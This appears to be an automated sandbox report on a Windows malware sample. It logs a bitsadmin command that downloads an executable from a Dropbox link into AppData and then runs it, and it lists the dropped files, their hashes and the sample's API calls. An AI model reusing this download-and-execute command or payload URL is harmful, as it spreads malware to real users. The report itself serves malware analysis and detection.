| Environment | Set Environment String | name = COPYCMD |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCodeAscii |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Process | Create | process_name = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, os_pid = 0x65c, creation_flags = CREATE_NEW_CONSOLE, CREATE_UNICODE_ENVIRONMENT, CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Thread | Resume | process_name = c:\windows\system32\cmd.exe, os_tid = 0xa54 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\waitfor.exe |
| Command Line | waitfor /t 5 YKERQ |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:17, Reason: Child Process |
| Unmonitor | End Time: 00:10:13, Reason: Terminated by Timeout |
| Monitor Duration | 00:09:56 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0xa6c |
| Parent PID | 0xa50 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A70
|
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\bitsadmin.exe |
| Command Line | bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:22, Reason: Child Process |
| Unmonitor | End Time: 00:10:13, Reason: Terminated by Timeout |
| Monitor Duration | 00:09:51 |
| Information | Value |
|---|---|
| PID | 0xa90 |
| Parent PID | 0xa50 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A94
0x
A98
0x
A9C
0x
AA0
0x
AA4
0x
B2C
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-01-10 10:49:13 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 88889 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\bitsadmin.exe, base_address = 0xff2a0000 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76f70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x76f8c4a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76f70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76f86d40 |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 36 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 30 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 41 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 94 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 88 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| COM | Create | interface = 5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C, cls_context = CLSCTX_LOCAL_SERVER |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = https, server_name = www.dropbox.com, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe |
|
1 | |
| Inet | Send HTTP Request | url = https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 5 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 12 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 6 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 5 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-01-10 10:49:13 (UTC) |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 13 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 5 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 12 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 6 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 5 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:51:56 (UTC) |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 5 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 12 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 6 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 5 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:51:56 (UTC) |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 5 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 14 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 6 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 5 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:52:04 (UTC) |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 11 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 16 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 5 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 14 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 6 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 5 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:52:10 (UTC) |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 21 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 16 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 5 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 14 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 6 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 5 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:52:15 (UTC) |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 22 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 16 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 5 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 14 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 6 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 5 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:52:25 (UTC) |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 22 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 16 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 5 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 14 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 6 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 5 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:52:35 (UTC) |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 23 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 15 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 16 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 5 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 13 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 6 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 5 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 8 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 22 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 20 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\aetadzjz\appdata\roaming\iuoldw.exe |
| Command Line | C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:16, Reason: Child Process |
| Unmonitor | End Time: 00:10:13, Reason: Terminated by Timeout |
| Monitor Duration | 00:08:57 |
| Information | Value |
|---|---|
| PID | 0x65c |
| Parent PID | 0xa50 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
8EC
0x
6C4
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\updaa5900b0.bat | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 192.00 KB (196608 bytes) |
MD5:
71c63dd6822598c7f7c7ab4c9ceb6ba9
SHA1: 854db67ad532a4af63443f8e6f684762e3c9efca SHA256: 99d542d87fc15670f0e353e1bcb788ed6cd05dc6464a3b011fa7af206ff6a083 |
|
|
| c:\users\aetadzjz\appdata\local\temp\updaa5900b0.bat | 0.20 KB (200 bytes) |
MD5:
b1dd1aa15fb939d335f5c39a8ed85ab8
SHA1: 3ea3a7be8ec7b7cce6e9cc1b52c77199858119a6 SHA256: 8ba84a14936373863bb48478a9c13ac8d67e08ff26a4eb5c6bd88237587e6ffd |
|
|
| c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv | 1.73 KB (1776 bytes) |
MD5:
f3963866cf1b0a9cae95cf0ec6aae77e
SHA1: 946fa1fe444c25648522407a7c690ea43e0d3837 SHA256: b4710fc930d2add348793b3160ed9c45b24ee8dcae605ee8ae198c107ef43285 |
|
|
| c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig | 0.70 KB (720 bytes) |
MD5:
084cd34da60abfe463f4bcdf6ff6c7c4
SHA1: 376783a4491e556cf55f5b6d3f5ef8edcb6d4faa SHA256: ceddead7e5868e0d0bd135ad23248b1c6562111ccb65bdba7e1cc37314c02712 |
|
|
| c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin | 0.17 KB (171 bytes) |
MD5:
1142692290abc4073f6cb4f996e782fa
SHA1: d71b914d853ef1017dda3d6a0cbd29127aac5730 SHA256: 6c75444d6330e8c0c49f14bb9cb9c55b176820f769378554b9af13fce7115cba |
|
|
| c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin | 16.74 KB (17146 bytes) |
MD5:
18c3f549ae3ef0029f410aa06ca2ad50
SHA1: 2b599a6397db74b8e074dd3a38eb0d2aad8b3be9 SHA256: 4b2dba04ac1ce23a8d5c43f671a55182fdffb5e6a9366d0b019a1dae4afb7d53 |
|
|
| c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin | 17.36 KB (17779 bytes) |
MD5:
734b4714f249866d6af2cd47b0929a3d
SHA1: 323502054d5c3e5294e62377d1626ed6261a4673 SHA256: c36c81a8858e6c68f06d494aa33406ce0c407d672b802f431d273877e507e05f |
|
|
| c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin | 18.96 KB (19413 bytes) |
MD5:
e485ce36ccb80721109792301f591596
SHA1: 61e99372d88b5d6412a3e465316e9622c3ff25d4 SHA256: 68a132e520254be9c0f568603076331efc9b54e89f2eafc538a0397faaee5f06 |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsTNT, address_out = 0x0 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| File | Get Info | filename = STD_ERROR_HANDLE, type = file_type |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75a05235 |
|
1 | |
| Mutex | Create | - |
|
1 | |
| Module | Get Handle | module_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
1 | |
| Module | Get Filename | module_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, size = 260 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = OLEAUT32.DLL, base_address = 0x76b60000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x76bc70a1 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x76b60000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = DispCallFunc, address_out = 0x76b73dcf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x76b707b7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x76b91ca9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = CreateTypeLib2, address_out = 0x76b78e70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromUdate, address_out = 0x76b77684 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarUdateFromDate, address_out = 0x76b7cc98 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = GetAltMonthNames, address_out = 0x76ba903a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x76b76231 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x76b75fea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR4, address_out = 0x76b83f94 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR8, address_out = 0x76b84e9e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromDate, address_out = 0x76badb72 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromI4, address_out = 0x76b92a8c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromCy, address_out = 0x76bad737 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromDec, address_out = 0x76bae015 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x76bacc3d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x76bad1c4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x76bad48c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x76bad4c6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x76bad509 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetIID, address_out = 0x76b7e7bb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x76b7e496 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x76b7ddf1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x76bad53f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormat, address_out = 0x76bb2055 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatDateTime, address_out = 0x76bb20ea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatNumber, address_out = 0x76bb2151 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatPercent, address_out = 0x76bb21f5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatCurrency, address_out = 0x76bb2288 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarWeekdayName, address_out = 0x76bb2335 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarMonthName, address_out = 0x76bb23d5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x76b85934 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x76b85a98 |
|
1 | |
